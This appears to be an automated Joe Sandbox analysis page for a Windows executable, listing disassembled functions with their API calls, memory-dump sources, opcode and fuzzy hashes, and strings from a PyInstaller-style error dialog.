Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
Instruction ID: 5471c1dd55ec371c5e29f409ebe85d98a542606ad9c778c1eb80ef898dc9f91f
Opcode Fuzzy Hash: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
Instruction Fuzzy Hash: 65018E2292C692C2E750BB14E40127EB3A0FB81BA1FA00235EAAD815E8DF7CD010CB04

Function 00007FF64778B00C Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B022
GetLastError.KERNEL32(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B02C

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorLast
String ID:
API String ID: 2050971199-0
Opcode ID: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
Instruction ID: 041d02b3a66a2f8b9219fc67d2ee11f41be58dc347456f1a2d183fad2e3bbd11
Opcode Fuzzy Hash: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
Instruction Fuzzy Hash: 0FE0C250F0D202C2FF18BBF2D84583811919F98B45FC54434DC2DC72A2DE2CA8858628

Function 00007FF6477887A8 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE ref: 00007FF6477887AC
GetLastError.KERNEL32 ref: 00007FF6477887B6

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
Instruction ID: 1406309ecc1c9aaa44aa99df4dceed7a663ee69d32bc3aed0b447b84b77b3dc8
Opcode Fuzzy Hash: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
Instruction Fuzzy Hash: CFD01250F2E503C1F65437B69C4607911A26F55B71FD10630DC2DC21E0DE3CA0850119

Function 00007FF647787F24 Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNELBASE ref: 00007FF647787F28
GetLastError.KERNEL32 ref: 00007FF647787F32

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
Instruction ID: 5ffb1c57dd8f4c4ecc7eedcb41585d233c6fb17e2d2175b5ddceb253bf4a5f42
Opcode Fuzzy Hash: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
Instruction Fuzzy Hash: 49D01210F1E503C2F65437B79C8787921955F55730FD10770DC2EC01E0DE2CA0860219

Function 00007FF647777D50 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF647778BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778C1A

_findclose.LIBCMT ref: 00007FF647777FA9

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ByteCharMultiWide_findclose
String ID:
API String ID: 2772937645-0
Opcode ID: 5d60b06fc9f4bb83c594c7e5293bb97dce9ec5e9439419983571f2289f3b39da
Instruction ID: 7506732061a91862296a5e7224b7747cd58b01cc15d31deda9443d01c966afd4
Opcode Fuzzy Hash: 5d60b06fc9f4bb83c594c7e5293bb97dce9ec5e9439419983571f2289f3b39da
Instruction Fuzzy Hash: 7E719852E18AC5C1EA10EB2CC5452FD6360FBA9B48F95E321DF8C52592EF28E2D9C344

Function 00007FF64778C56C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64778C594

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
Instruction ID: bf81139c387b2b0dc4c26994ca84473a47679701c6defcfb655d3dcb38612c8f
Opcode Fuzzy Hash: 6b5c5ab8eeff71e39afe9fda2295d49407cb2b42678b128b0c7397afbf7fbff2
Instruction Fuzzy Hash: 1041B072A0C241C3EA34FB29E5402797BA1EF56B95F921271DE8EC3790CF2CE40AC655

Function 00007FF6477783F0 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
Instruction ID: 4067081b098fa3c5ad1aecb1ef1e5ff6c800ca93019cb382ee88a509ac81b8cb
Opcode Fuzzy Hash: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
Instruction Fuzzy Hash: FF415016E1CB85C1EA51BB28D5112FD6360FBA5744FD5A232EF8D82193EF6CB5D88304

Function 00007FF6477782C0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF64777836A

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: b98f66e4a09d3080de4f7931106bb7b6ba15956e2f28422e24f31262f9d98128
Instruction ID: 67511355297fc6cd7af164d43b4d65419c09abac64883737762b22c8cf63becd
Opcode Fuzzy Hash: b98f66e4a09d3080de4f7931106bb7b6ba15956e2f28422e24f31262f9d98128
Instruction Fuzzy Hash: 7D216822B0C292C6FA50BB26A9047BEA651FF45BD4FC85430EE0D8B786DE7DF441C608

Function 00007FF64778BFFC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64778C082

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 991c086762b97ce1bf58a0820ab8ed553d2cc556ed1ebb985c1376564fde346c
Instruction ID: dd8e1b21d95293af4f20e2df9d2e8d6832086ad0115376d132fb2add4095ccdf
Opcode Fuzzy Hash: 991c086762b97ce1bf58a0820ab8ed553d2cc556ed1ebb985c1376564fde346c
Instruction Fuzzy Hash: 9731AD22A1C702C5F751BF65C8413783A51AF84BA5FC20675EE2C873D2CE7CE8498719

Function 00007FF647789FF1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF64778A01F

Part of subcall function 00007FF64778A118: GetModuleHandleExW.KERNEL32 ref: 00007FF64778A13D
Part of subcall function 00007FF64778A118: GetProcAddress.KERNEL32 ref: 00007FF64778A153
Part of subcall function 00007FF64778A118: FreeLibrary.KERNEL32 ref: 00007FF64778A17A

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
Instruction ID: b1d515fb2853ea1d4379c6f723f37238f6c79ebf4cf215dc9b097946f2761603
Opcode Fuzzy Hash: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
Instruction Fuzzy Hash: 3D217C72B08746CAEB24AF74C4403AC37A0EB0471CF960636DA2D86AD6EF38D584CB54

Function 00007FF6477865A8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64778650D

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction ID: ec7e0f5cf0b1735b9ae3f304e52a34dd820013a9e0791b1f66fee1b47f0f9e0c
Opcode Fuzzy Hash: c06f943cf2cfad6cae40bb945918742757c954c3eb67e691afc5a150f41a7f23
Instruction Fuzzy Hash: 87119361B1C642C1EA60BF51D44127DA364BF84B80F8A4931EE8DD7A9BDF3CD4408718

Function 00007FF647796DAC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF647796DCF

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
Instruction ID: 8d27aa9fae4bdba7a4230d4912623237aebc797bf13a94084663ddf85893ff89
Opcode Fuzzy Hash: 513e03f871098e076a65fb8bab8bb253d597a6200523e68a4e261718b8ca4e46
Instruction Fuzzy Hash: B621AF72A1CA81C6EB61BF18D48037972A0EB94B94F944334EE6DC66D9DF3DD8108B04

Function 00007FF6477805FC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF647780650

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction ID: ff659784e79eb9c85440395b47ecb509639b00c2515a2f7d62681186a0fcde34
Opcode Fuzzy Hash: e4e6805aeaf9884a68cba76bd798531beecc2a98c7129b287afec428eebc8cdc
Instruction Fuzzy Hash: 52016161B0CB41C1EA04FB52D900169A695BF85FE4F8A4A31EE6C97BD6CE3CE5018718

Function 00007FF647787BB0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF647787BEE

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f73c62597e7360775599b130af8d7787deaeebf14f296c678ba137edcd315959
Instruction ID: ecabee26575e47fb2f3830c2237d64096b95cce17b05906e1a15a74b1aff407c
Opcode Fuzzy Hash: f73c62597e7360775599b130af8d7787deaeebf14f296c678ba137edcd315959
Instruction Fuzzy Hash: A1018020E1D742C0FA60BBA3E981179299DAF507A4FD64A34ED1EC36D6DE2CF4418349

Function 00007FF64778F258 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF64778BAA6,?,?,?,00007FF64778AC67,?,?,00000000,00007FF64778AF02), ref: 00007FF64778F2AD

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
Instruction ID: cd716cedfa5fe3d53c284d9aecd9e4b0359958cc0817e69164f76a6b3cee4ceb
Opcode Fuzzy Hash: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
Instruction Fuzzy Hash: 53F01D59B0E606D1FE54B7A5D4512BD62915F9DB90FCD4430CD0ECA7D1DE1CE4818628

Function 00007FF64778DCBC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF647780E24,?,?,?,00007FF647782336,?,?,?,?,?,00007FF647783929), ref: 00007FF64778DCFA

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
Instruction ID: 7c6b140f6bb7bf7db92b297c3cba053c29d6e41bbaeeba56655c4b4d3af5aaca
Opcode Fuzzy Hash: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
Instruction Fuzzy Hash: A5F05840B0D246D5FE647762D85037512909F98BA0F8A8630DD2ECE2C2DE6CA8508228

Function 00007FF647787EEC Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF647787F05

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
Instruction ID: 5f5ff8e5ecb2a840b8b474a5e8db0de9d1b9569a74e0a37489a0846200ece79b
Opcode Fuzzy Hash: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
Instruction Fuzzy Hash: E8E0EC64F0C306C2FB157BE3C9825B821164F14351F925431EE0A8A3C3DE1CA8469679

Non-executed Functions

Function 00007FF647771F50 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON

Download Yara Rule

APIs

GetDialogBaseUnits.USER32 ref: 00007FF647771F9E
MulDiv.KERNEL32 ref: 00007FF647771FB2
MulDiv.KERNEL32 ref: 00007FF647771FD3
SystemParametersInfoW.USER32 ref: 00007FF64777201B
CreateFontIndirectW.GDI32 ref: 00007FF64777202F
#380.COMCTL32 ref: 00007FF647772053
CreateWindowExW.USER32 ref: 00007FF6477720A6
CreateWindowExW.USER32 ref: 00007FF647772100
CreateWindowExW.USER32 ref: 00007FF64777215D
CreateWindowExW.USER32 ref: 00007FF6477721BF
SendMessageW.USER32 ref: 00007FF6477721DF
SendMessageW.USER32 ref: 00007FF6477721F9
SendMessageW.USER32 ref: 00007FF647772218
SendMessageW.USER32 ref: 00007FF647772237
SendMessageW.USER32 ref: 00007FF647772255
SendMessageW.USER32 ref: 00007FF647772273
SendMessageW.USER32 ref: 00007FF647772291
SendMessageW.USER32 ref: 00007FF6477722A9
SendMessageW.USER32 ref: 00007FF6477722C1
GetClientRect.USER32 ref: 00007FF6477722D0

Part of subcall function 00007FF6477723F0: GetDC.USER32 ref: 00007FF64777241B
Part of subcall function 00007FF6477723F0: SelectObject.GDI32 ref: 00007FF647772462
Part of subcall function 00007FF6477723F0: DrawTextW.USER32 ref: 00007FF647772485
Part of subcall function 00007FF6477723F0: SelectObject.GDI32 ref: 00007FF64777249B
Part of subcall function 00007FF6477723F0: ReleaseDC.USER32 ref: 00007FF6477724AB
Part of subcall function 00007FF6477723F0: MoveWindow.USER32 ref: 00007FF6477724FB
Part of subcall function 00007FF6477723F0: MoveWindow.USER32 ref: 00007FF64777253B
Part of subcall function 00007FF6477723F0: MoveWindow.USER32 ref: 00007FF64777258E

Strings

Failed to execute script '%ls' due to unhandled exception: %ls, xrefs: 00007FF647771F7D
STATIC, xrefs: 00007FF64777205C, 00007FF6477720B1
EDIT, xrefs: 00007FF64777210B
BUTTON, xrefs: 00007FF647772176
Close, xrefs: 00007FF647772168

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
API String ID: 2446303242-1601438679
Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction ID: fd433c347e223f2d58e518a47bc1fa0e99f97fb2ab443d34a69a3fb7cdf19be9
Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction Fuzzy Hash: E6A14576608B85C6E714EF21E45479AB360FB88B84F90412AEF9D83B24CF3DE164CB44

Function 00007FF64777C67C Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF64777C698
RtlCaptureContext.KERNEL32 ref: 00007FF64777C6C5
